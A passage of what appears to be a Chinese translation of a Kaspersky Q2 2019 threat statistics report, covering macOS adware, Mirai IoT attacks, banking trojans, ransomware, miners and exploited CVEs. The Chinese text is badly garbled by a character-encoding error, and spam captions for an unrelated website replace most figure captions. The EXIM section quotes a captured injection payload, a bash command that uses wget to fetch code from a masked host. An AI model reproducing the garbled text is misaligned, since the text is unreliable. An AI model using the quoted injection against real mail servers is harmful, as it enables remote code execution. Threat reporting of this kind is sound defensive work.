AdWare.OSX.Pirrit.q

4.31

13

AdWare.OSX.Bnodlero.v

4.02

14

AdWare.OSX.Bnodlero.q

3.70

15

AdWare.OSX.MacSearch.d

3.66

16

Downloader.OSX.InstallCore.ab

3.58

17

AdWare.OSX.Geonei.as

3.48

18

AdWare.OSX.Amc.a

3.29

19

AdWare.OSX.Agent.c

2.93

20

AdWare.OSX.Mhp.a

2.90

* Êܹ¥»÷macOSÓû§°Ù·Ö±È



¹ØÓÚQ2×î³£¼ûµÄmacOSÍþв£¬Shlayer.aľÂí£¨24.61%£©Î¬³ÖÔÚ°ñÊ×£¬ÅÅÔÚµÚ¶þÃûµÄÊǸæ°×Èí¼þAdWare.OSX.Spc.a£¨12.75%£©¡£µÚÈýÃûÊÇAdWare.OSX.Bnodlero.t£¨11.98%£©£¬Ëü½«AdWare.OSX.Pirrit.j£¨11.27%£©¼·ÖÁµÚËÄ¡£ÓëÉÏÒ»¼¾¶ÈÒ»Ñù£¬Top 20ÖеĴóÎÞÊý¶¼ÊǸæ°×Èí¼þ£¬ÆäÖÐPirrit¼Ò×åÓÖÓÈΪ͹Æð£ºËüÃÇÔÚTop20ÖÐÕ¼¾ÝÁË5¸öϯλ¡£


3.2 µØÀíÉ¢²¼



                ¹ú¶È*                                  %**

1

·¨¹ú

11.11

2

Î÷°àÑÀ

9.68

3

Ó¡¶È

8.84

4

ÃÀ¹ú

8.49

5

¼ÓÄôó

8.35

6

¶íÂÞ˹

8.01

7

Òâ´óÀû

7.74

8

Ó¢¹ú

7.47

9

Ä«Î÷¸ç

7.08

10

°ÍÎ÷

6.85

* ²»Ô̺¬¿¨°Í˹»ùmacOSÓû§½ÏÉٵĹú¶È£¨ÉÙÓÚ1Íò£©

** ¸Ã¹ú¶ÈËùÓп¨°Í˹»ùmacOSÓû§ÖÐÊܹ¥»÷µÄ±ÈÀý

¾ÍmacOSÍþвµÄµØÀíÉ¢²¼¶øÑÔ£¬·¨¹ú£¨11.11%£©¡¢Î÷°àÑÀ£¨9.68%£©ºÍÓ¡¶È£¨8.84%£©Î¬³ÖÔÚǰÈý¡£
ÔÚÃÀ¹ú£¨8.49%£©¡¢¼ÓÄôó£¨8.35%£©ºÍ¶íÂÞ˹£¨8.01%£©¹ú¶È£¬ÊÜϰȾµÄÓû§±ÈÀýÓÐËùÔö³¤£¬Ê¹µÃÕâЩ¹ú¶ÈÔÚTop10ƽ±ðÀëÅÅÔÚµÚËÄ¡¢µÚÎåºÍµÚÁù¡£



ËÄ¡¢ÎïÁªÍøÍþв

__


4.1 Í·ÌõÊÂÎñ


ÔÚLinux/UnixÍþвµÄÊÀ½çÀ×î³Á´óµÄÊÂÎñÊÇÀûÓÃEXIMÓʼþ´úÀíзì϶µÄ¹¥»÷ÊýÁ¿¼¤Ôö¡£¼ò¶øÑÔÖ®£¬¹¥»÷Õß´´½¨Ò»¸öÌØÊâµÄµç×ÓÓʼþ£¬²¢ÔÚÊÕ¼þÈË×Ö¶ÎÖÐÌîдҪÔÚÖ¸±ê·þÎñÆ÷ÉÏÖ´ÐеĴúÂ룬µ±Í¨¹ýÖ¸±ê·þÎñÆ÷·¢ËÍ´ËÓʼþʱ£¬EXIM»áÖ´ÐÐÕâЩ¶ñÒâ´úÂë¡£


GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾

½Ø»ñµÄ¹¥»÷Á÷Á¿


ÉÏͼÖÐÏÔʾÁËÒ»·âÔÚRCPT×Ö¶ÎÖÐÔ̺¬shell¾ç±¾µÄÓʼþ¡£¸Ã¾ç±¾ÏÖʵÉÏ¿´ÆðÀ´ÈçÏ£º

1

/bin/bash        -c      "wget X.X.X.X/exm -O /dev/null



4.2 ÎïÁªÍøÍþвͳ¼Æ


2019ÄêQ2¼ûÖ¤ÁËtelnet¹¥»÷µÄÑϳÁÏ»¬£ºÕ¼±ÈԼΪ60%£¬Q1ÖÐΪ80%¡£ÆäÔ­Òò¿ÉÄÜÊÇ·¸×ï·Ö×ÓÕýÖð²½×ªÏò¿ªÆôÁËSSHµÄ¸ü¸ßЧӲ¼þ¡£


SSH

40.43%

Telnet

59.57%

2019ÄêQ2£¬Êܹ¥»÷·þÎñµÄÉ¢²¼


È»¶ø£¬Æ¾¾Ý¿¨°Í˹»ùÃ۹޼ͼµÄÊý¾Ý£¬SSH»á»°µÄÊýÁ¿´ÓQ1µÄ64%½µÂäµ½Q2µÄ49.6%¡£


SSH

49.59%

Telnet

50.41%

2019ÄêQ2£¬¿¨°Í˹»ùÃ۹޼ͼµÄ»á»°É¢²¼


4.3 »ùÓÚTelnetµÄ¹¥»÷



GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾

2019ÄêQ2£¬¿¨°Í˹»ùÃ۹޼ͼµÄTelnet¹¥»÷ÆðÔ´É¢²¼


4.3.1 Telnet¹¥»÷ÆðÔ´µÄ¹ú¶ÈÉ¢²¼Top10


                       ¹ú¶È                                             %

1

°£¼°

15.06

2

Öйú

12.27

3

°ÍÎ÷

10.24

4

ÃÀ¹ú

5.23

5

¶íÂÞ˹

5.03

6

Ï£À°

4.54

7

ÒÁÀÊ

4.06

8

Öйų́Íå

3.15

9

Ó¡¶È

3.04

10

ÍÁ¶úÆä

2.90


Â½ÐøÁ½¸ö¼¾¶È£¬°£¼°£¨15.06%£©ÅÅÔÚTelnet¹¥»÷Ô´µÄ°ñÊ×£¬µÚ¶þÃûÓëÖ®²î¾à²»´ó£¬ÊÇÖйú£¨12.27%£©£¬µÚÈýÃûÊǰÍÎ÷£¨10.24%£©¡£


»ùÓÚTelnetµÄ¹¥»÷Öз¸×ï·Ö×Ó×ʹÓõŤ¾ßÊdzôÃûÔ¶ÑïµÄMirai¼Ò×å³ÉÔ±¡£


4.3.2 Telnet¹¥»÷ÖÐÏÂÔØµÄ¶ñÒâÈí¼þTop10


                            ÌØµã                                                                        %*

1

Backdoor.Linux.Mirai.b

38.92

2

Trojan-Downloader.Linux.NyaDrop.b

26.48

3

Backdoor.Linux.Mirai.ba

26.48

4

Backdoor.Linux.Mirai.au

15.75

5

Backdoor.Linux.Gafgyt.bj

2.70

6

Backdoor.Linux.Mirai.ad

2.57

7

Backdoor.Linux.Gafgyt.az

2.45

8

Backdoor.Linux.Mirai.h

1.38

9

Backdoor.Linux.Mirai.c

1.36

10

Backdoor.Linux.Gafgyt.av

1.26

* Êܹ¥»÷Óû§±ÈÀý


ÊÂʵ֤Ã÷£¬Ã»ÓÐÈκÎÀíÓÉÈ¥µÈ´ýMiraiְλµÄ±ä¶¯£¬ËüÈÔÊÇÎïÁªÍø¹¥»÷ÖÐ×îÊ¢ÐеĶñÒâÈí¼þ¼Ò×å¡£


4.4 »ùÓÚSSHµÄ¹¥»÷


GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾

2019ÄêQ2£¬¿¨°Í˹»ùÃ۹޼ͼµÄSSH¹¥»÷ÆðÔ´É¢²¼


4.4.1 SSH¹¥»÷ÆðÔ´µÄ¹ú¶ÈÉ¢²¼Top10


                          ¹ú¶È                                                        %

1

Ô½ÄÏ

15.85

2

Öйú

14.51

3

°£¼°

12.17

4

°ÍÎ÷

6.91

5

¶íÂÞ˹

6.66

6

ÃÀ¹ú

5.05

7

Ì©¹ú

3.76

8

°¢Èû°Ý½®

3.62

9

Ó¡¶È

2.43

10

·¨¹ú

2.12





ÔÚ2019ÄêQ2£¬¿¨°Í˹»ùÃ۹޼ͼµÄSSH¹¥»÷ÆðÔ´É¢²¼Top3±ðÀëÊÇÔ½ÄÏ£¨15.85%£©¡¢Öйú£¨14.51%£©ºÍ°£¼°£¨12.17%£©¡£Q1ÖÐÅÅÃûµÚ¶þµÄÃÀ¹ú£¨5.05%£©±¾¼¾¶ÈÏ»¬ÖÁµÚÆßÃû¡£

Îå¡¢½ðÈÚÍþв

__


5.1 ½ðÈÚÍþвͳ¼Æ


ÔÚ2019ÄêQ2£¬¿¨°Í˹»ù²úÆ·¹²ÔÚ228,206ÃûÓû§µÄÍÆËã»úÉÏ×èÖ¹ÁËÕë¶ÔÒøÐÐÕË»§µÄ¶ñÒâÈí¼þ¹¥»÷¡£



GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾

2019ÄêQ2£¬ÊܽðÈÚÍþв¹¥»÷µÄÓû§ÊýÁ¿



5.2 µØÀíÉ¢²¼


ΪÁËÆÀ¹ÀºÍ±ÈÁ¦È«ÇòÁìÓòÄÚÒøÐÐľÂíºÍATM/POS¶ñÒâÈí¼þµÄϰȾ·çÏÕ£¬¿¨°Í˹»ùͳ¼ÆÁË·ÖÆç¹ú¶ÈÊÜ´ËÀàÍþв¹¥»÷µÄÓû§ËùÕ¼±ÈÀý¡£


GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾

2019ÄêQ2£¬ÒøÐжñÒâÈí¼þ¹¥»÷µÄµØÀíÉ¢²¼


5.2.1 Êܹ¥»÷Óû§µÄ¹ú¶ÈÉ¢²¼Top10


                        ¹ú¶È*                            %**

1

°×¶íÂÞ˹

2.0

2

ίÄÚÈðÀ­

1.8

3

Öйú

1.6

4

Ó¡¶ÈÄáÎ÷ÑÇ

1.3

5

º«¹ú

1.3

6

ÈûÆÖ·˹

1.2

7

°ÍÀ­¹ç

1.2

8

¶íÂÞ˹

1.2

9

¿¦Âó¡

1.1

10

Èû¶ûάÑÇ

1.1

* ²»Ô̺¬¿¨°Í˹»ùÓû§½ÏÉٵĹú¶È£¨ÉÙÓÚ1Íò£©

** ¸Ã¹ú¶ÈËùÓп¨°Í˹»ùÓû§ÖÐÊÜÒøÐÐľÂí¹¥»÷µÄ±ÈÀý



5.2.2 ÒøÐжñÒâÈí¼þ¼Ò×åTop10


                   Ãû³Æ                          ÌØµã                                                                                %*

1

RTM

Trojan-Banker.Win32.RTM

32.2


2

Zbot

Trojan.Win32.Zbot

23.3


3

Emotet

Backdoor.Win32.Emotet

8.2


4

Nimnul

Virus.Win32.Nimnul

6.4


5

Trickster

Trojan.Win32.Trickster

5.0


6

Nymaim

Trojan.Win32.Nymaim

3.5


7

SpyEye

Backdoor.Win32.SpyEye

3.2


8

Neurevt

Trojan.Win32.Neurevt

2.8


9

IcedID

Trojan-Banker.Win32.IcedID

1.2


10

Gozi

Trojan.Win32.Gozi

1.1


* Êܹ¥»÷Óû§±ÈÀý


Óëǰһ¼¾¶ÈÏà±È£¬2019ÄêQ2µÄÒøÐжñÒâÈí¼þTop3ûÓвúÉú±ä¶¯¡£Ç°Á½ÃûÈ·µ±ÏÈ·ù¶È½Ï´ó£¬±ðÀëÊÇTrojan-Banker.Win32.RTM£¨32.2%£©ºÍTrojan.Win32.Zbot£¨23.3%£©¡£ËüÃǵķݶî±ðÀëÔö³¤ÁË4.8ºÍ0.4¸ö°Ù·Ö±È¡£ÅÅÔÚÆäºóµÄÊÇBackdoor.Win32.Emotet£¨8.2%£©£¬ËüµÄ·Ý¶îÏà·´ÊÇ×ÅÂäÁË1.1¸ö°Ù·Öµã¡£´Ó6ÔÂ·ÝÆðÍ·£¬Emotet C&C·þÎñÆ÷µÄ»î¶¯Öð²½Ï÷¼õ£¬µ½ÁËQ3³õÆÚÏÕЩËùÓеÄC&C½©Ê¬ÍøÂç¶¼ÒѲ»³ÉÓá£


ÔÚQ2ÖÐTrojan-Banker.Win32.IcedID£¨1.2%£©ºÍTrojan.Win32.Gozi£¨1.1%£©³Ê´Ë¿ÌTop10ÖУ¬·ÖÁеھź͵ÚÊ®¡£

Áù¡¢ÀÕË÷Èí¼þ

__



6.1 ¼¾¶ÈÁÁµã


¾­¹ý18¸öÔµĻý¼«·Ö·¢ºó£¬ÀÕË÷Èí¼þGandCrab±³ºóµÄ·¸×ïÍÅ»ï°ä·¢Í˳ö¡£Æ¾¾Ý¿¨°Í˹»ùµÄ»ã±¨£¬¸ÃÀÕË÷Èí¼þ³ÉΪ×îÊ¢ÐеļÓÃÜÍþв֮һ¡£


ÔÚQ2£¬ÐÂÀÕË÷Èí¼þSodin£¨±ðÃûSodinokibiºÍREvil£©ÆðÍ·½øÐд«²¼¡£¸ÃÀÕË÷Èí¼þÓм¸µãÖµÍ×ÌùÐÄ£¬Ëüͨ¹ý±»ÈëÇֵķþÎñÆ÷½øÐзַ¢£¬²¢ÇÒÀûÓÃÁËÒ»¸öº±¼ûµÄLPE exp£¬¸ü²»ÓÃÌáÆä¸´ÔӵļÓÃÜģʽ¡£


»¹ÊÇÔÚQ2£¬³öÏÖÁËһЩÕë¶Ô³ÇÊÐÖÎÀí²¿Ãŵĸߵ÷ÀÕË÷Èí¼þ¹¥»÷ÊÂÎñ¡£Õâ²¢²»ÊÇÒ»¸öеÄÇ÷Ïò£¬ÈëÇÔìóÒµ¼°ÊÐÕþÍøÂç½øÐÐڲƭÊdz£¼ûµÄ¹¥»÷³¡¾°¡£µ«½üÄêÀ´´ËÀàÊÂÎñµÄ´ó¹æÄ£·¢×÷ÒýÆðÁËÈËÃǶԹؼüÍÆËã»ú»ù´¡ÉèÊ©µÄ°²È«ÐԵĹØ×¢£¬ÓÉÓÚ²»½ö½öÊÇÓ×ÎÒºÍÆóÒµ£¬Õû¸öÉçÇø¶¼ÒÀÀµÓÚÕâЩ»ù´¡ÉèÊ©¡£


6.2 бäÖÖµÄÊýÁ¿


2019ÄêQ2¿¨°Í˹»ù¼ì²âµ½8¸öеÄÀÕË÷Èí¼þ¼Ò×壬²¢ÇÒ·¢ÏÖÁË16,017¸öбäÖÖ¡£Ïà±ÈÖ®ÏÂQ1µÄбäÖÖÊýÁ¿ÊÇ5,222¸ö£¬Ö»ÓÐQ2µÄÈý·ÖÖ®Ò»¡£


GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾

2018ÄêQ2 ¨C 2019ÄêQ2£¬ÀÕË÷Èí¼þбäÖÖµÄÊýÁ¿¶Ô±È


´óÎÞÊýбäÖÖÊôÓÚTrojan-Ransom.Win32.Gen¼Ò×壨»ùÓÚÐÐΪ¹æ¶¨×Ô¶¯¼ì²âµ½µÄ¸÷ÀàľÂí£©ºÍTrojan-Ransom.Win32.PolyRansom¡£ÆäÖÐPolyRansomµÄ±äÖÖÊýÁ¿ÊÇÓÉÆäÐÔ×Ó¾ö¶¨µÄ ¨C ¸ÃÈ䳿»á´´½¨×ÔÉíµÄ´óÁ¿Í»±äÌ壬²¢½«ÕâЩ±äÌå´úÌæÎªÓû§Îļþ£¬½«¼ÓÃܺóµÄÓû§Êý¾Ý¸éÖÃÆäÖС£


6.3 Êܹ¥»÷Óû§ÊýÁ¿


2019ÄêQ2¿¨°Í˹»ù²úÆ·¹²±£»¤232,292¸öKSNÓû§×èÖ¹ÁËÀÕË÷Èí¼þ¹¥»÷£¬±ÈÉÏÒ»¼¾¶ÈÏ÷¼õÁË5Íò¶à¡£


GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾

2019ÄêQ2£¬Ôâ·êÀÕË÷Èí¼þ¹¥»÷µÄÓû§ÊýÁ¿


Êܹ¥»÷Óû§ÊýÁ¿×î¶àµÄÔ·ÝÊÇ4Ô£¨107,653£©£¬ËüÉõÖÁ¸ßÓÚ3Ô·ݵÄÊý×Ö£¨106,519£©£¬Õâ±ê־ȡQ1ÖÐÉÏÉýÇ÷ÏòµÄÒ»Á¬¡£È»¶ø£¬ÔÚ5Ô·ÝÕâÒ»Êý×ÔìðÍ·½µÂ䣬µ½ÁË6Ô·ÝÖ»ÓÐ82,000¶àÒ»µã¡£


6.4 µØÀíÉ¢²¼


GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾

2019ÄêQ2£¬Êܹ¥»÷Óû§µÄµØÀíÉ¢²¼


6.4.1 Êܹ¥»÷Óû§µÄ¹ú¶ÈÉ¢²¼Top 10



                   ¹ú¶È*                                                                                       %**

1

ÃϼÓÀ­¹ú

8.81%

2

ÎÚ×ȱð¿Ë˹̹

5.52%

3

Īɣ±È¿Ë

4.15%

4

°£Èû¶í±ÈÑÇ

2.42%

5

Äá²´¶û

2.26%

6

°¢¸»º¹

1.50%

7

Öйú

1.18%

8

¼ÓÄÉ

1.17%

9

º«¹ú

1.07%

10

¹þÈø¿Ë˹̹

1.06%

* ²»Ô̺¬¿¨°Í˹»ùÓû§½ÏÉٵĹú¶È£¨ÉÙÓÚ5Íò£©

** ¸Ã¹ú¶ÈËùÓп¨°Í˹»ùÓû§ÖÐÊÜÀÕË÷Èí¼þ¹¥»÷µÄ±ÈÀý



6.5 ÀÕË÷Èí¼þTop10


GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾





** Êܹ¥»÷Óû§±ÈÀý* ¿¨°Í˹»ùµÄ¼ì²âÁ˾Ö



Æß¡¢¶ñÒâ¿ó¹¤


___


7.1 бäÖÖµÄÊýÁ¿


2019ÄêQ2¿¨°Í˹»ù¼ì²âµ½7,156¸ö¶ñÒâ¿ó¹¤Ð±äÖÖ£¬±ÈQ1ÉÙÁ˽«½ü5,000¡£


GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾

2019ÄêQ2£¬¶ñÒâ¿ó¹¤Ð±äÖÖµÄÊýÁ¿


4Ô·ݵÄбäÖÖÊýÁ¿×î¶à£¨3,101£©£¬ÏÕЩ±È3Ô·ݶàÁ˽ü1000¸ö£¬µ«¾ùÔÈÏÂÀ´Ð¿󹤻¹ÊÇÔ½À´Ô½ÉÙ¡£

7.2 Êܹ¥»÷Óû§ÊýÁ¿


Q2¿¨°Í˹»ùÔÚÈ«ÇòÁìÓòÄÚ¹²ÔÚ749,766¸öÓû§µÄÍÆËã»úÉϼì²âµ½¶ñÒâ¿ó¹¤¡£


GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾

2019ÄêQ2£¬ÊܶñÒâ¿ó¹¤¹¥»÷µÄÓû§ÊýÁ¿

ÕûÌåÀ´¿´£¬Q2Êܹ¥»÷Óû§ÊýÁ¿Öð²½Ï÷¼õ ¨C ´Ó4Ô·ݵÄ383,000½µÂäÖÁ6Ô·ݵÄ318,000¡£


7.3 µØÀíÉ¢²¼



GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾


2019ÄêQ2£¬Êܹ¥»÷Óû§µÄµØÀíÉ¢²¼



ÊܶñÒâ¿ó¹¤¹¥»÷µÄÓû§¹ú¶ÈÉ¢²¼Top 10


                    ¹ú¶È*                                                                          % Êܹ¥»÷Óû§±ÈÀý**

1

°¢¸»º¹

10.77%

2

°£Èû¶í±ÈÑÇ

8.99%

3

ÎÚ×ȱð¿Ë˹̹

6.83%

4

¹þÈø¿Ë˹̹

4.76%

5

̹ɣÄáÑÇ

4.66%

6

Ô½ÄÏ

4.28%

7

Īɣ±È¿Ë

3.97%

8

ÎÚ¿ËÀ¼

3.08%

9

°×¶íÂÞ˹

3.06%

10

ÃɹÅ

3.06%

* ²»Ô̺¬¿¨°Í˹»ùÓû§½ÏÉٵĹú¶È£¨ÉÙÓÚ5Íò£©

** ¸Ã¹ú¶ÈËùÓп¨°Í˹»ùÓû§ÖÐÊܶñÒâ¿ó¹¤¹¥»÷µÄ±ÈÀý




°Ë¡¢·¸×ï·Ö×Ó³Áµã¹Ø×¢µÄ´àÈõÀûÓÃ

______________________________________


ÔÚ´ÓǰµÄÒ»ÄêÖУ¬OfficeÌ×¼þ³ÉΪ×î³£Êܵ½¹¥»÷µÄÀûÓ÷¨Ê½¡£2019ÄêQ2Ò²²»Àý±í ¨C Office·ì϶ÀûÓõıÈÀý´Ó67%Ôö³¤µ½72%¡£ÕâÒ»Ôö³¤±³ºóµÄÔ­ÒòÊÇ´óÁ¿µÄÀ¬»øÓʼþÖÐÔ̺¬ÁËCVE-2017-11882¡¢CVE-2018-0798ºÍCVE-2018-0802·ì϶ÀûÓá£ÕâЩ·ì϶ÓëOfficeµÄ¹«Ê½±à×ëÆ÷×é¼þÓйØ£¬ÀûÓÃÁ˶ÔÏó´¦Öùý³ÌÖеĻº³åÇøÒç³öbug½øÐÐÔ¶³Ì´úÂëÖ´ÐС£ÆäËü³£±»·¸×ï·Ö×ÓÀûÓõÄOffice·ì϶»¹Ô̺¬CVE-2017-8570ºÍCVE-2017-8759¡£


Office·ì϶ÀûÓõÄÈÕÒæ±é¼°Åú×¢£¬·¸×ï·Ö×Ó½«ÆäÊÓΪÔÚÖ¸±êÍÆËã»úÉϲ¿Êð¶ñÒâÈí¼þµÄ×îµ¥Ò»¿ì½Ý·½Ê½¡£»»¾ä»°Ëµ£¬ÕâЩ·ì϶ÀûÓøüÓпÉÄܳɹ¦£¬ÓÉÓÚËüÃǵÄÌåʽʹµÃÄܹ»Ê¹Óø÷À༼ÊõÈÆ¹ý¾²Ì¬µÄ¼ì²â¹¤¾ß£¬²¢ÇÒÆäÖ´ÐжÔÓû§Êǰµ²ØµÄ£¬ÎÞÐè¶î±íµÄ×÷Ϊ£¬ÀýÈçºê¾ç±¾¡£



GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾


2019ÄêQ2£¬·¸×ï·Ö×ÓʹÓõķì϶ÀûÓÃÉ¢²¼


Q2 webä¯ÀÀÆ÷Öеķì϶ÀûÓÃÕ¼±ÈΪ14%£¬ÊÇOffice·ì϶ÀûÓõÄÎå·ÖÖ®Ò»¡£´óÎÞÊýä¯ÀÀÆ÷·ì϶ÊǼ´Ê±ÆÚÂë±àÒëºÍ¶à½×¶Î´úÂëÓÅ»¯ÃýÎóµÄÁ˾Ö¡£ÕâЩ¹ý³ÌµÄÂß¼­Ïà¶Ô¸´ÔÓ£¬±ØÒª¿ª·¢ÈËÔ±³ö¸ñÓ×ÐÄ¡£¶ÔÊý¾ÝºÍÊý¾ÝÀàÐͱ䶯µÄ²»³ä·Ö²é³­ÍùÍù»áµ¼ÖÂзì϶¡£ÆäËü¿Éµ¼ÖÂRCEµÄ³£¼ûÎÊÌ⻹Ô̺¬Êý¾ÝÀàÐÍÒç³ö¡¢ÒÑ¿ªÊÍÄÚ´æÔÙʹÓúͲ»ÕýÈ·µÄÀàÐÍʹÓᣱ¾¼¾¶È×îÓÐȤµÄÒ»¸öÀý×Ó»òÐíÊÇÕë¶ÔCoinbaseºÍÆäËü¼¸¼Ò¹«Ë¾µÄÒ»¸ö0dayÀûÓá£ËüÔÚÒ°±í±»·¢ÏÖ£¬ÀûÓÃÁËMozilla FirefoxÖеÄRCE·ì϶CVE-2019-11707ºÍCVE-2019-11708¡£

ÔÚ0day·½Ã棬Q2°²È«×êÑÐÔ±SandboxEscaper°ä²¼µÄexpÓÈÆäÖµÍ×ÌùÐÄ¡£ÕâЩexp±»¶¨ÃûΪPolarBear£¬ÀûÓÃÁËWindows 10ÖеÄÌáȨ·ì϶CVE-2019-1069¡¢CVE-2019-0863¡¢CVE-2019-0841ºÍCVE-2019-0973¡£


Q2ÍøÂç¹¥»÷µÄÕ¼±È³ÖÐøÔö³¤¡£·¸×ï·Ö×ÓûÓн¡ÍüÕë¶Ô佨²¹SMBϵͳµÄÓÀºãÖ®À¶¹¥»÷£¬Ò²³ÖÐø»ý¼«ÔÚÍøÂçÀûÓã¨ÈçOracle WebLogic£©ÖÐÒýÈëеķì϶ÀûÓ᣻¹Òª°ÑÎÈÕë¶ÔRDP·þÎñºÍMicrosoft SQLServerµÄÃÜÂë¹¥»÷¡£µ«ÊÇ£¬´óÎÞÊýÓû§Ãæ¶ÔµÄ×î´óÍþв»¹ÊÇQ2ÖÐÅû¶µÄ·ì϶ CVE-2019-0708¡£¸Ã·ì϶ӰÏìÁËXP¡¢win7ºÍwindows server 2008ÖеÄÔ¶³Ì×ÀÃæ·þÎñ¡£·¸×ï·Ö×ÓÄܹ»ÀûÓÃËüÀ´»ñȡԶ³Ì½ÚÔìȨ£¬²¢ÇÒ´´½¨ÀàËÆÓÚWanaCryµÄÍøÂçÈ䳿¡£¶Ô´«ÈëÊý¾Ý°üµÄ²»³ä·ÖɨÃèÔÊÐí¹¥»÷ÕßÀûÓÃUAF¾ç±¾¸²¸ÇÄÚºËÄÚ´æÖеÄÊý¾Ý¡£Çë°ÑÎȸ÷ì϶ÀûÓÃÎÞÐè»ñÈ¡ÕË»§ÃÜÂ룬¼´Ëü²úÉúÔÚÑéÖ¤Óû§ÃûºÍÃÜÂë֮ǰµÄÊÚȨ½×¶Î¡£


8.1 ͨ¹ýÍøÂç×ÊÔ´ÌáÒéµÄ¹¥»÷


8.1.1 ÍøÂç¹¥»÷ÆðÔ´¹ú¶ÈµÄTop10


2019ÄêQ2¿¨°Í˹»ù½â¾ö¹æ»®×èÖ¹ÁËÈ«Çò203¸ö¹ú¶ÈµÄÔÚÏß×ÊÔ´ÌáÒéµÄ717,057,912´Î¹¥»÷¡£Web·´²¡¶¾×é¼þ¼ì²âµ½217,843,293¸ö·ÖÆçµÄ¶ñÒâURL¡£


GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾


2019ÄêQ2£¬ÍøÂç¹¥»÷ÆðÔ´µÄ¹ú¶ÈÉ¢²¼


±¾¼¾¶ÈWeb·´²¡¶¾×é¼þ×î³£±»ÃÀ¹úµÄÔÚÏß×ÊÔ´´¥·¢¡£ÕûÌåÀ´¿´£¬Top 4ÅÅÃûÓëǰһ¼¾¶ÈûÓб䶯¡£


8.1.2 Óû§Ï°È¾·çÏÕ×î¸ßµÄ¹ú¶È


ΪÁËÆÀ¹À·ÖÆç¹ú¶ÈÓû§Ãæ¶ÔµÄÔÚÏßϰȾ·çÏÕ£¬¿¨°Í˹»ùͳ¼ÆÁ˸ùú¶ÈWeb·´²¡¶¾×é¼þ±»´¥·¢µÄÓû§°Ù·Ö±È¡£Óɴ˲úÉúµÄÊý¾Ý½²ÁËÈ»·ÖÆç¹ú¶ÈÍøÂç»·¾³µÄÇÖÂÔÐÔ¡£


¸ÃÅÅÃû½öÔ̺¬¶ñÒâÈí¼þÀàµÄ¹¥»÷£¬²»Ô̺¬ÈκÎDZÔÚÓꦻòΣÏÕ·¨Ê½£¬ÀýÈç»ÒÉ«Èí¼þºÍ¸æ°×Èí¼þ¡£



                        ¹ú¶È*                                                                                  % Êܹ¥»÷Óû§°Ù·Ö±È**

1

°¢¶û¼°ÀûÑÇ

20.38

2

ίÄÚÈðÀ­

19.13

3

°¢¶û°ÍÄáÑÇ

18.30

4

Ï£À°

17.36

5

Ħ¶û¶àÍß

17.30

6

ÃϼÓÀ­¹ú

16.82

7

°®É³ÄáÑÇ

16.68

8

°¢Èû°Ý½®

16.59

9

°×¶íÂÞ˹

16.46

10

ÎÚ¿ËÀ¼

16.18

11

·¨¹ú

15.84

12

·ÆÂɱö

15.46

13

ÑÇÃÀÄáÑÇ

15.40

14

Í»Äá˹

15.29

15

±£¼ÓÀûÑÇ

14.73

16

²¨À¼

14.69

17

ÁôÄáÍô

14.68

18

À­ÍÑάÑÇ

14.65

19

ÃØÂ³

14.50

20

¿¨Ëþ¶û

14.32

* ²»Ô̺¬¿¨°Í˹»ùÓû§½ÏÉٵĹú¶È£¨ÉÙÓÚ1Íò£©

** ¸Ã¹ú¶ÈËùÓп¨°Í˹»ùÓû§ÖÐÊܶñÒâÈí¼þ¹¥»÷µÄ±ÈÀý



¾ùÔȶøÑÔ£¬±¾¼¾¶ÈÈ«Çò12.12%µÄ»¥ÁªÍøÓû§Ôâµ½ÖÁÉÙÒ»´Î¶ñÒâÈí¼þ¹¥»÷¡£



GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾

2019ÄêQ2£¬¶ñÒâÍøÂç¹¥»÷µÄµØÀíÉ¢²¼


8.2 ±¾µØÍþв


2019ÄêQ2¿¨°Í˹»ùÎļþ·´²¡¶¾ÏµÍ³¼ì²âµ½240,754,063¸ö¶ñÒ⼰DZÔÚÓк¦Ñù±¾¡£


8.2.2 ±¾µØÏ°È¾·çÏÕ×î¸ßµÄ¹ú¶È


                     ¹ú¶È*                                                                                             % Êܹ¥»÷Óû§±ÈÀý**

1

°¢¸»º¹

55.43

2

Ëþ¼ª¿Ë˹̹

55.27

3

ÎÚ×ȱð¿Ë˹̹

55.03

4

Ò²ÃÅ

52.12

5

ÍÁ¿âÂü˹̹

50.75

6

ÀÏÎÎ

46.12

7

ÐðÀûÑÇ

46.00

8

Ãåµé

45.61

9

ÃɹÅ

45.59

10

°£Èû¶í±ÈÑÇ

44.95

11

ÃϼÓÀ­¹ú

44.11

12

ÒÁÀ­¿Ë

43.79

13

Öйú

43.60

14

²£ÀûάÑÇ

43.47

15

Ô½ÄÏ

43.22

16

ίÄÚÈðÀ­

42.71

17

°¢¶û¼°ÀûÑÇ

42.33

18

¹Å°Í

42.31

19

Īɣ±È¿Ë

42.14

20

¬Íú´ï

42.02

ÕâЩÊý¾ÝÔ̺¬Óû§ÍÆËã»ú»òÏνӵ½ÍÆËã»úµÄ¿ÉÒÆ¶¯½éÖÊ£¬ÀýÈçuÅÌ¡¢Ïà»úÄڴ濨¡¢µç»°ºÍ±í½ÓÓ²Å̵ÈÉϼì²âµ½µÄ¶ñÒⷨʽ¡£

* ²»Ô̺¬¿¨°Í˹»ùÓû§½ÏÉٵĹú¶È£¨ÉÙÓÚ1Íò£©

** ¸Ã¹ú¶ÈËùÓп¨°Í˹»ùÓû§ÖÐÊܶñÒâÈí¼þÀà±¾µØÍþв¹¥»÷µÄ±ÈÀý



GA»Æ½ð¼×¡¤(ÖйúÇø)¹Ù·½ÍøÕ¾

2019ÄêQ2£¬±¾µØÍþвµÄµØÀíÉ¢²¼


